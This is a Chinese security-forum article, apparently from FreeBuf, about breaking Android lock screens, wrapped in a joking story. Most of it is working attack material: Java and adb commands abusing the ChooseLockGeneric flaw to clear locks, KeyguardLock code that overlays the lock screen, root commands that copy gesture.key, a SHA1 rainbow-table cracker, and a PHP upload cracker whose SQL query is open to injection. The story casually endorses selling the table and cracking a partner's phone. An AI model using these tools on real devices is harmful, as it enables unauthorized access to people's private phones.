说明: 本文章由中国红客联盟(cnhonker)攻防区版主:b41k3r 和 论坛会员:冷爱 两人合作所写,经两人同意由我发送到FreeBuf,感谢FreeBuf给我们提供一个良好的交流环境。此文章为b41k3r 刘尼玛系列文章的《Android锁屏破解研究》 关于其他篇目,以后再共享。最后吐槽下,b41k3r每一篇刘尼玛系列都有人躺枪,这篇我和kend都不幸中招。

b41k3r部分:

[照例先发牢骚]

由于发帖神的影响,我手中的很多东西都不敢发出来,这次我给发帖神烧了三天高香,希望他可以饶恕我,让我发了这个帖子不要出事,万一发完仍然倒霉了,那我也认了.各位,俺这是用绳命在发帖啊!
我在研究完这个东西之后,把其中的彩虹表发给冷爱,他据此做了一个gesture.key的php在线破解,他的程序会在此贴的后面发布,所以这次其实是联合发帖.
[刘尼玛的好基友]

我是Q博士,这次的事情是刘尼玛用私人身份请求我帮忙,和情报工作无关,刘尼玛从小穿一条裤子长大的好基友kend,前几天重设自己的安卓手机密码时,居然把新设的锁屏图案忘记了,为此他的姘头刘尼玛来找我,希望我帮他破解…

0×01 最新安卓解锁漏洞

在破解之前,我们先来认识一个比较新的安卓漏洞.这个漏洞于2013年12月公布,影响4.3及以下所有系统,漏洞产生于com.android.settings.ChooseLockGeneric这个Activity中,一个名为mPasswordConfirmed的boolean被暴露,导致可以从外部触发解锁进程而无需确认解锁密码,具体看下面的分析:
com.android.settings.ChooseLockGeneric是负责更改系统的解锁方式的类,在用户要更改原先的锁定图案或密码时,需要进行重输确认, 确认后mPasswordConfirmed的值为true,但这个参数被暴露,以至于可以从外部更改,使得系统误认为已经确认了密码,从而清除锁屏.我们看看源码:

…………..
private static final String CONFIRM_CREDENTIALS = "confirm_credentials";
………….
private boolean mPasswordConfirmed = false;
…………..
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
……………
final boolean confirmCredentials = getActivity().getIntent()
.getBooleanExtra(CONFIRM_CREDENTIALS, true);
mPasswordConfirmed = !confirmCredentials;

我们只要将CONFIRM_CREDENTIALS设置为false,即可使得mPasswordConfirmed为true,然后会发生什么呢?接着往下看:

………………
if (mPasswordConfirmed) {
        updatePreferencesOrFinish();
}
………………
private void updatePreferencesOrFinish() {
Intent intent = getActivity().getIntent();
int quality = intent.getIntExtra(LockPatternUtils.PASSWORD_TYPE_KEY, -1);
if (quality == -1) {
quality = intent.getIntExtra(MINIMUM_QUALITY_KEY, -1);
MutableBoolean allowBiometric = new MutableBoolean(false);
quality = upgradeQuality(quality, allowBiometric);
final PreferenceScreen prefScreen = getPreferenceScreen();
if (prefScreen != null) {
prefScreen.removeAll();
}
addPreferencesFromResource(R.xml.security_settings_picker);
disableUnusablePreferences(quality, allowBiometric);
} else {
updateUnlockMethodAndFinish(quality, false);
}
}
……………………
void updateUnlockMethodAndFinish(int quality, boolean disabled) {
if (!mPasswordConfirmed) {
throw new IllegalStateException("Tried to update password without confirming it");
}
final boolean isFallback = getActivity().getIntent().getBooleanExtra(LockPatternUtils.LOCK
SCREEN_BIOMETRIC_WEAK_FALLBACK, false);
quality = upgradeQuality(quality, null);
if (quality >= DevicePolicyManager.PASSWORD_QUALITY_NUMERIC) {
int minLength = mDPM.getPasswordMinimumLength(null);
if (minLength < MIN_PASSWORD_LENGTH) {
minLength = MIN_PASSWORD_LENGTH;
}
final int maxLength = mDPM.getPasswordMaximumLength(quality);
Intent intent = new Intent().setClass(getActivity(), ChooseLockPassword.class);
intent.putExtra(LockPatternUtils.PASSWORD_TYPE_KEY, quality);
intent.putExtra(ChooseLockPassword.PASSWORD_MIN_KEY, minLength);
intent.putExtra(ChooseLockPassword.PASSWORD_MAX_KEY, maxLength);
intent.putExtra(CONFIRM_CREDENTIALS, false);
intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
isFallback);
if (isFallback) {
startActivityForResult(intent, FALLBACK_REQUEST);
return;
} else {
mFinishPending = true;
intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
startActivity(intent);
}
} else if (quality == DevicePolicyManager.PASSWORD_QUALITY_SOMETHING) {
Intent intent = new Intent(getActivity(), ChooseLockPattern.class);
intent.putExtra("key_lock_method", "pattern");
intent.putExtra(CONFIRM_CREDENTIALS, false);
intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
isFallback);
if (isFallback) {
startActivityForResult(intent, FALLBACK_REQUEST);
return;
} else {
mFinishPending = true;
intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
startActivity(intent);
}
} else if (quality == DevicePolicyManager.PASSWORD_QUALITY_BIOMETRIC_WEAK) {
Intent intent = getBiometricSensorIntent();
mFinishPending = true;
startActivity(intent);
} else if (quality == DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED) {
mChooseLockSettingsHelper.utils().clearLock(false);
mChooseLockSettingsHelper.utils().setLockScreenDisabled(disabled);
getActivity().setResult(Activity.RESULT_OK);
finish();
} else {
finish();
}
}

先是调用updatePreferencesOrFinish,然后是updateUnlockMethodAndFinish,在这个函数中判断系统的锁屏密码策略,android系统一共定义有以下几种密码策略:

PASSWORD_QUALITY_ALPHABETIC    用户输入的密码必须要有字母(或者其他字符)
PASSWORD_QUALITY_ALPHANUMERIC  用户输入的密码必须要有字母和数字
PASSWORD_QUALITY_NUMERIC       用户输入的密码必须要有数字
PASSWORD_QUALITY_SOMETHING     由设计人员决定的
PASSWORD_QUALITY_UNSPECIFIED   对密码没有要求

前几种都是给设计锁屏软件的程序员用的,系统默认的策略,包括解锁图案(因为解锁图案无法设定其他策略),都是最后一种,即”对密码没有要求”,而从上面代码可以看出,如果检测到是这种方式,则无需任何验证,直接清除密码.
所以,触发这个漏洞的方式很简单,只要从外部启动ChooseLockGeneric,设置mPasswordConfirmed为true,并设置锁屏密码策略为PASSWORD_QUALITY_UNSPECIFIED,系统会自己清除密码.
于是接下来有两条路可走:
一是编写一个简单的安卓程序.在Oncreate中输入以下代码,编译后首先确认手机已打开调试模式,然后在电脑上安装好驱动, 用adb传送到手机运行:

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.settings", "com.android.settings.ChooseLockGeneric")); //启动ChooseLockGeneric"
intent.putExtra("confirm_credentials", false);  //confirm_credentials为false,mPasswordConfirmed为true
intent.putExtra("lockscreen.password_type",0);  //lockscreen.password_type为0代表PASSWORD_QUALITY_UNSPECIFIED
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);

手机锁屏被立刻清除,在有些手机上会弹出错误提示,但其实已经成功了:

二是直接使用adb,输入以下命令:

adb shell am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task

然后重启手机即可.
在最新的安卓4.4中,这个漏洞被修复, mPasswordConfirmed被设置为只有特定的Activity才可以更改其值:

………………….
public static class InternalActivity extends ChooseLockGeneric {
}
………………….
final boolean confirmCredentials = getActivity().getIntent()
.getBooleanExtra(CONFIRM_CREDENTIALS, true);
if (getActivity() instanceof ChooseLockGeneric.InternalActivity) {
mPasswordConfirmed = !confirmCredentials;
}
用InternalActivity继承了ChooseLockGeneric,只有它才可以更改mPasswordCOnfi
rmed.

0×02 一个不算漏洞的漏洞

上面的第一种方法有个致命的问题,那就是在已锁定的状态下,启动的程序是无法运行的,如果要让我们编写的触发程序正常运行,需要使用到一个由来已久的奇怪漏洞.这个漏洞首先由wooyun披露(http://www.wooyun.org/bugs/wooyun-2010-09978),说它是漏洞,因为它可以完全屏蔽安卓系统的屏幕锁定,用我们自己的程序覆盖在其上层,说它不是漏洞,因为它是谷歌官方提供的API,很莫名其妙的API…
在android.app.KeyguardManger中,谷歌提供了一个子类KeyguardLock,我们在自己编写的程序中调用其disableKeyguard方法,就可以使程序完全显示在锁定界面的上层:

import android.app.KeyguardManager;
import android.app.KeyguardManager.KeyguardLock;
………………………
KeyguardManager manager = (KeyguardManager) getSystemService(KEYGUARD_SER
VICE);
if(manager.inKeyguardRestrictedInputMode()){
KeyguardLock keyguard = manager.newKeyguardLock(getLocalClassName());
keyguard.disableKeyguard();
}

经过测试.无论何种锁定方法均有效,运行后按Home键完全没有反应,按返回键直接回到桌面,但过一段时间,手机锁屏还是会自己出现,不过这段时间足够我们做一些事情了,比如利用前面的解锁漏洞.

0×03 gesture.key文件的秘密

说了一大堆都是关于解锁的,但都是讲的过程,利用代码来触发漏洞,那么问题就来了,无论用什么方法,我们最终还是要操作这个锁屏图案的,可是它到底保存在哪里?以什么方式储存的?
实际上我探究这个问题是从一篇报道开始的,这篇东西已经在网上被转载的到处都是了,随便百度一下就有一大堆:

我很奇怪的是,破解各种设备和账号如探囊取物一般的FBI,高手如云的FBI,居然搞不定一台小小的手机,抱着极度怀疑的心态我进行了研究,结果发现这条所谓的新闻完全是彻头彻尾的扯淡!
当然通过前面的部分你们已经看到了,几乎是秒破,但这只是删除了解锁图案,如果我要获取解锁图案该怎么办?
首先要知道这个图案储存的位置,它存在于/data/system目录中的gesture.key文件中,只有root后才可以读取,用16进制编辑器打开后,发现它是一个20字节的文件:

很眼熟,让我想到了SHA1,经过验证,确实是这样.安卓的解锁图案一共有九个点,按顺序设定值为0×00-0×08(注意这里是十六进制),如下图所示:

这九个值依据设定好的解锁图案的顺序,依次排列,排列结果以hex的形式进
行SHA1加密,然后以byte形式存储于gesture.key中.比如上面十六进制编辑器打开的文件,密文是
6a062b9b3452e366407181a1bf92ea73e9ed4c48,原文实际上是00010204060708,注意这是十六进制,不
是十进制,这样排列下来,是一个
Z字形图案.
那么一个想法就产生了,我们可以把所有可能的图案全部转换成值,然后以SHA1加密,就可以制作一个彩虹表:

import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public class sha1Class {
        
    private static final char[] HEX_DIGITS = { '0', '1', '2', '3', '4', '5',
            '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' };

        public sha1Class() {

        }
        
        /**
         * 十六进制字符串SHA1
         * @param hexData
         * @return
         */
        public String sha1code(String hexData){
                byte[] data = hexStringToByteArray(hexData);
                MessageDigest md = null;
                try {
                        md = MessageDigest.getInstance("SHA-1");
                } catch (NoSuchAlgorithmException e) {
                        e.printStackTrace();
                }
                md.update(data, 0, data.length);
                byte[] sha1hash = md.digest();
                return getFormattedText(sha1hash);
        }
        
        /**
         * 把十六进制字符串转换成byte
         * @param s
         * @return
         */
        private static byte[] hexStringToByteArray(String s) {
            int len = s.length();
            byte[] data = new byte[len / 2];
            for (int i = 0; i < len; i += 2) {
                data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4)
                                     + Character.digit(s.charAt(i+1), 16));
            }
            return data;
        }
        
        /**
         * 把byte转换成string
         * @param bytes
         * @return
         */
        private static String getFormattedText(byte[] bytes) {
                int len = bytes.length;
                StringBuilder buf = new StringBuilder(len * 2);
                for (int j = 0; j < len; j++) {
            buf.append(HEX_DIGITS[(bytes[j] >> 4) & 0x0f]);
                        buf.append(HEX_DIGITS[bytes[j] & 0x0f]);
                }
                        return buf.toString();
                }
}

上面的类实例化之后,只需调用函数sha1code即可获得密文.具体过程是先把原文的十六进制字符串转换成byte,然后SHA1,再将结果转换成string.
安卓解锁图案的规则是至少4个点,至多9个点,那么如此计算:
4个点的密码 9*8*7*6=3024
5个点的密码 9*8*7*6*5=115120
6个点的密码 9*8*7*6*5*4=60480
7个点的密码 9*8*7*6*5*4*3=181440
8个点的密码 9*8*7*6*5*4*3*2=362880
9个点的密码 9*8*7*6*5*4*3*2*1=362880
上述之总和为985824个密码,我们用上面给出的类,将这些密码全部
SHA1,然后把原文和密文都存储在数据库中,一个彩虹表就完成了,最终,我用sqlite制作的彩虹表大小为77mb.接下来只需编写程序,先把彩虹表
用adb拷贝到SD卡中,然后获取root权限,读取gesture.key文件,然后与数据库中的密文进行hash碰撞,就可以得到密码,并且还原为解
锁图形.

/**
* 以root权限执行命令函数
* @param cmd
* @return
*/
private boolean runCmd(String cmd){  
        Process process = null;  
        DataOutputStream os = null;  
        try{  
                    process = Runtime.getRuntime().exec("su");  //请求root权限
                    os = new DataOutputStream(process.getOutputStream());  
                    os.writeBytes(cmd+ "\n");  
                    os.writeBytes("exit\n");  
                    os.flush();  
                    process.waitFor();  
          } catch (Exception e) {  
                      return false;  
} finally {  
                      try {  
                           if (os != null)   {  
                               os.close();  
                           }  
                               process.destroy();  
                          } catch (Exception e) {  
                          }  
                      }  
            return true;  
        }

…………………


String sd=Environment.getExternalStorageDirectory().getPath();
String code = "";
BufferedInputStream in;
runCmd("cat /data/system/gesture.key > /sdcard/gesture.key"); //首先获取root,然后拷贝文件到SD卡中
try {
                in = new BufferedInputStream(new FileInputStream(sd+"/gesture.key"));
                byte[] a = new byte[1024];  //byte方式读取并转换为string
                int count = -1;
                StringBuilder s1 = new StringBuilder(); 
                while ((count = in.read(a)) != -1) {  
                for (int i = 0; i < count; i++) {  
                convertByte2Hex(a[i], s1);  
                }  
          
        in.close(); 
        if (fileIsExists(sd+"/sha1.db")) //检测彩虹表是否存在
        {
                SQLiteDatabase db = openOrCreateDatabase(sd+"/sha1.db", Context.MODE_PRIVATE, null);  //连接彩虹表数据库
            Cursor c = db.rawQuery("SELECT * FROM sha1dic where sha1= ?", new String[]{s1.toString()});  
            while (c.moveToNext()) {  
            code = c.getString(c.getColumnIndex("code"));   //查表并获取原文
         }  
           c.close(); 
           db.close();  
}else
        {
            Toast toast = Toast.makeText(MainActivity.this,"没有找到彩虹表,请确认sha1.db是不是已经拷贝到了sd卡中!", Toast.LENGTH_SHORT); 
            toast.show();
        }
} catch (FileNotFoundException e) {
                e.printStackTrace();
} catch (IOException e) {
                e.printStackTrace();
}

0×04 综合出一个神器

上面介绍了三个和破解安卓锁屏有关的东西,我们现在要做的,就是综合它们各自的优点,制作出一个解锁神器来.
首先用adb把彩虹表传送到sd卡中,然后利用KeyguardLock屏蔽锁屏界面,显示我们的程序,程序中设计两个功能:还未root的手机使用解锁
漏洞解锁,已root的则直接读取gesture.key 并查表破解(当然已root也可以使用解锁漏洞).具体流程如下图所示:

程序的具体代码请看文后的下载地址,界面如下:

安装方法:

确认手机已经事先开了调试模式,然后在PC上建立如下批处理,安装好adb和手机驱动,并把彩虹表和解锁程序以及批处理都放在同一个目录中,运行批处理即可开启神器(sha1.db是彩虹表, puzzleUnlock.apk是解锁神器):

adb push sha1.db /sdcard/sha1.db
adb install puzzleUnlock.apk
adb shell am start -n com.baiker.puzzleunlock/com.baiker.puzzleunlock.MainActivity

由于绕过锁屏的方法并不完美,所以有些手机上可能没有反应,此时请重启手机,神器会自动运行,如果还不成功,请使用下面的ADB解锁法.
只利用PC解锁说明:

本来制作了一个PC版本,但其解锁原理仍然是通过ADB命令,所以觉得没有意义,就不公开了,如果用手机版无法成功,可以在PC上输入以下ADB命令:

adb shell am start -n 
com.android.settings/com.android.settings.ChooseLockGeneric --ez 
confirm_credentials false --ei lockscreen.password_type 0 
--activity-clear-task

如果成功,命令运行后重启手机,即可解锁.
0×05 测试

由于安卓平台的高度可定制性,各厂商的固件均不相同,所以神器并不能保证在所有品牌的设备上均有效,截止目前,共测试以下品牌:

Samsung: 4.0以上固件在pc上用ADB可以正常解锁,手机版无法绕过锁屏,4.0以下固件手机版可以绕过锁屏,但无法解锁.
小米: 手机版完全无法安装,PC上用ADB未测试.
魅族:完美破解
步步高:完美破解
波导:完美破解
Asus平板:完美破解

[kend已经走了]
刘尼玛拿到了我的解锁神器,不费吹灰之力的解开了手机,当他拿着手机兴冲冲地去找kend基友的时候,却发现人去屋空,询问邻居才知道,kend昨天晚上接到紧急通知,公司派他去国外出差,已经坐上了去马来西亚的飞机……
刘尼玛只好怅然而归.  ”看来,只有等他回来再给他了.” 回到家的刘尼玛一边自言自语,一边把手机收到抽屉里,然后坐到电脑前,饶有兴致的去研究他最喜欢的爱情动作片了.
而Q博士,也就是本人,在研究完神器之后,把其中的彩虹表单独卖给一个猥琐的菊花经销商,狠狠的赚了一笔…..
本文所涉及到的程序以及源码,还有本文的doc版下载地址:
http://pan.baidu.com/s/1sj33bTr

冷爱部分:

[故事总有个开端]

Kend突然消失,只留下一部加锁的手机,他的原配小猪怀疑kend已经有了小三了,本想直接删除gesture.key文件,又怕事后被kend发现。
只好以30朵菊花代价,请菊花经销商破解。为了最大利润,菊花经销商只用15朵代价和q博士购买彩虹表,再用1朵菊花请村头行乞的看尼魅写个简易的使用程
序。
0×01 程序的设计的构建。

从q博士那里购买彩虹表,用的是sqlite数据库。使用php脚本读数据库。(在php里有多种方案可以实现读写sqlite数据库。这里采用了sqlite3的方法)。

在php.ini 里面开启extension=php_sqlite3.dll ,和绘图功能 extension=php_gd2.dll

可以用<?phpphpinfo() ;?>查看是否开启成功。

程序的设计流程,上传key文件,脚本读取key文件的内容,再把读取到key和数据库里面配对,如果有配对就绘图,否则提示客户key文件错误。
0×2 解读细节

File.php

<?php
   class file{

    protected $file;
    public function __construct(&$file)
                       {
                                     $this->file=$file;
                                    
                                   }
    public function file_upload(){
                  
                            if($this->file['error']!=0)
                            {
                            return false;
                            }
                            if(!is_uploaded_file($this->file['tmp_name']))
                            {
                             return false;
                            }
                            if(filesize($this->file['tmp_name'])!=20)
                            {
                           
                            return false;
                            }
                            if($this->getkFileSuffix()!='key')
                            {
                             return false;
                            }
                            $path=dirname(__FILE__).'/../key/';
                            $name=$this->rename();
                            $path=$path.$name;
                            $status=move_uploaded_file($this->file['tmp_name'],$path);
                   if($status)
                            {
                             return $path;
                            }else
                            {
                            return false;
                            }
             }
   
    public function getkFileSuffix()
                       {
                                      $pos=strrpos($this->file['name'],'.');

                                     $suffix=substr($this->file['name'],$pos+1);
                                      return $suffix;
                                   }
   
    public function rename()
                          {
                                       $name= time();
                                          $type=$this->getkFileSuffix();
                                       $name=$name.'.'.$type;

                                          return$name;
                                      }
   }
?>

file 类里面构造函数__construct()引用传递一个文件信息的参数。该参数由$_FILES['file']得到,$_FILES['file']包含了文件上传的信息,上传状态,大小,临时路径,名字。
getkFileSuffix()函数取得上传文件的后缀(即最后一个.以后的文本)。
rename()用于构建一下文件名,以文件上传时间戳来命名
file_upload()函数对在要上传文件,分别检查上传状态,是否是合法的http上传文件大小,正常的情况下key的大小为20字节。和检测是否为key后缀。以上检测都合法的话,就把文件从tmp文件夹里面移到key文件夹下。

Key.php

class key{

  public function readEncryptionKey($path)
                              {
                                   $fHandle=fopen($path,'rb');
                                   $contents=fread($fHandle,1);
                                   $hex='';
                                   while(!feof($fHandle))
                                   {
                                   $a=ord($contents);
                                   $hex.=sprintf("%02x",$a);
                                   $contents=fread($fHandle,1);
                                   }
                                   fclose($fHandle);
                                   return $hex;
                             }

  public function getDecryptionKey($path)
                  {
                                $key= $this->readEncryptionKey($path);

                                   $sql="select* from sha1dic  where sha1='$key' ";

                                   $x=sqlite::getInstance();
                                   $result=$x->ExcuteQuery($sql);
                                   $code=$result['code'];

                                   return$this->formatKey($code);
                              }
                              
                              
  protected function formatKey($code)
                     {
                                       $i=1;
                                          $pwd='';
                                          while(isset($code[$i]))
                                          {

                                          $pwd=$pwd.$code[$i];
                                          $i=$i+2;
                                       }
                       

                                          return$pwd;
                       }

}

在这个类里面。readEncryptionKey函数,打开key文件,并且通过
fread函数,每次读取一个字节。通过ord函数,把读取到的字节转化为asc码,在通过sprintf把得到的asc码按16进制存储。通过hex变
量进行拼接。最后返回的就是key里面的字符
例如

file:///C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\msohtml11\clip_image002.jpg

比如读取第一个字符,那么这个时候$content储存的是一个asc码为208的字符,用过ard就可以得到这个asc码(这个asc码是10进制的),接着通过sprintf,把数据格式化为16进制的,并且 保存在$key里面。

getDecryptionKey函数,读取key值,并且返回明文的密码。因为iq博士是木jj的,返回密码是是类似 01020506这里的。所以通过formatKey函数把多余的0去掉变成1256.

Sqlite.php

class sqlite{
  protected static $sqlite = null;

  protected $db;
  private function  __construct(){

   $path=dirname(__FILE__).'/../database/sha1.db';
    $this->db = new SQLite3($path);
  }
                     
  public static function getInstance(){
            

                     if(self::$sqlite instanceofsqlite )
                     {
                     
                        return self::$sqlite;
                     
                     }else{

                     self::$sqlite = newsqlite();
                     return self::$sqlite;
                     }
               
   
     }
        
  public function  ExcuteQuery($sql)
                  {
                               $result= $this->db->query($sql);
                               $res=$result->fetchArray(SQLITE3_ASSOC);
                               return $res;
                              }

}

用于读取sqlite数据库。getInstance函数实现了只有一个连接对象对sqlite数据库的连接。
ExcuteQuery函数用于执行传递进来的sql语句,并且返回得到的结果。
Image.php

header('Content-Type:image/jpeg');//用于通知浏览器接受数据的类型,以便显示
class image{
//这个数组保存了图片里面9个点的位置。以便用于绘图。

  protected $position=array(
       array('x'=>55,'y'=>160),
       array('x'=>215,'y'=>160),
       array('x'=>370,'y'=>160),
       array('x'=>55,'y'=>320),
       array('x'=>215,'y'=>320),
       array('x'=>370,'y'=>320),
       array('x'=>55,'y'=>480),
       array('x'=>215,'y'=>480),
       array('x'=>370,'y'=>480)     
);

protected $img;
protected $penColor;
  
  /*
   构造函数打开图片,返回文件实例。
   创建一个画笔和字符串的颜色
  */
  
  public function __construct()
  
         {

                 $this->img=imagecreatefromjpeg(dirname(__file__).'/../img/img.jpg');
                     $this->penColor=imagecolorallocate($this->img,255,0,0);

                 $this->strColor=imagecolorallocate($this->img,0,0,0);  


               }
      

  /**
   *绘画密码,输出密码
   *@param string 数据库得到的密码。
  */
      
  public function beginPaint($code)
  {     
   
       $i=0;
       while(isset($code[$i]))

         {

           $pos=intval($code[$i]);

          if($i>0)
              {
              $lastPos=intval($code[$i-1]);
              imageline($this->img,$this->position[$lastPos]['x'],$this->position[$lastPos]['y'],$this->position[$pos]['x'],$this->position[$pos]['y'],$this->penColor);

              }

        imagettftext($this->img,30,0,$this->position[$pos]['x'],$this->position[$pos]['y'],$this->strColor,dirname(__file__).'./simkai.ttf',$i+1);
//为了输出字体大小。我选择了自定义的字体。
        

          $i=$i+1;

         }
              imagejpeg($this->img);
  }  


}

Image.php 实现绘画图片。并且输出图片

Index.php

……
      ?>

<form action="./crack.php" method="post" enctype="multipart/form-data">

<input type="file" name="file"  />

<input type="submit" name="submit" value="Submit" />

</form>

…….

在index里面做一个表单,定义数据格式,数据接收路径和数据提交方法。

Crack.php

include_once './model/file.php';

 $file= new file($_FILES['file']);

 $path=$file->file_upload();

 if(!$path)

 {

   echo '上传文件失败,请确认是否为key文件!';

   exit();

 }
 include_once './model/key.php';
  $status=file_exists($path);
  if(!$status)

  {

  echo '文件不存在,请确认好文件地址。';

  exit();

  }
  $key= new key();

  $code=$key->getDecryptionKey($path);

  if(empty($code))

  {

  echo '该密码无法破解!';

  exit();

  }
 include_once './model/image.php';
  $img=new image();
  $img->beginPaint($code);

Crack文件用于组装各个模型。 接收 index.php发送过来的数据。保存文件,读取文件,破解密码,最后画图。

0×3 实战

三星 i9300 2.3.5系统 已经root.\ 一条数据线(用山寨居然不能识别到设备)

————————————————————————————————–

1-查看设备是否连接

2-文件在/system/data 下

 

3-导出文件。

如果直接用 pull导出的话,是不行的,会出现权限不足。

用root权限,把key 拷贝到sdcard目录下。

Hacking more

...